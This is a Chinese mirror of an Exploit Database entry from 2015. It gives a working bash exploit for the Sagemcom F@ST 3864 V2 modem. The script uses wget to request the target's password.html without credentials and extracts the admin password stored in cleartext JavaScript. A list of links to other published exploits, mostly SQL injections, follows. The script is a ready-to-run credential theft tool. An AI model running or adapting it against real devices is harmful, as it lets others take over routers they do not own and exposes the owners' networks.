Sagemcom F@ST 3864 V2 – Get Admin Password

Exploit Database
96 阅读

作者： Cade Bull

日期： 2015-08-17
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/37801/

#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################

# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
 
if [ "$1" != "" ]
then
	IP_ADDRESS="$1"
else
	echo "Usage : $0 IP_ADDRESS"
	exit 1
fi
 
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O -| grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"

last Exploits
Sagemcom F@ST 3864 V2 – Get Admin Password的更多信息

Fuel CMS 1.4.7 – ‘col’ SQL Injection (Authenticated)：
OpenCart 1.5.6.1 – ‘openbay’ Multiple SQL Injections：
Joomla! Component AMGallery 1.2.3 – ‘filter_category_id’ SQL Injection：
Hospital Management Startup 1.0 – ‘Multiple’ SQLi：
pbboard 2.1.1 – Multiple Vulnerabilities：
WebUI 1.5b6 – Remote Code Execution：
PHP Address Book – ‘/addressbook/register/edit_user.php?id’ SQL Injection：
WordPress Plugin Events Calendar – SQL Injection：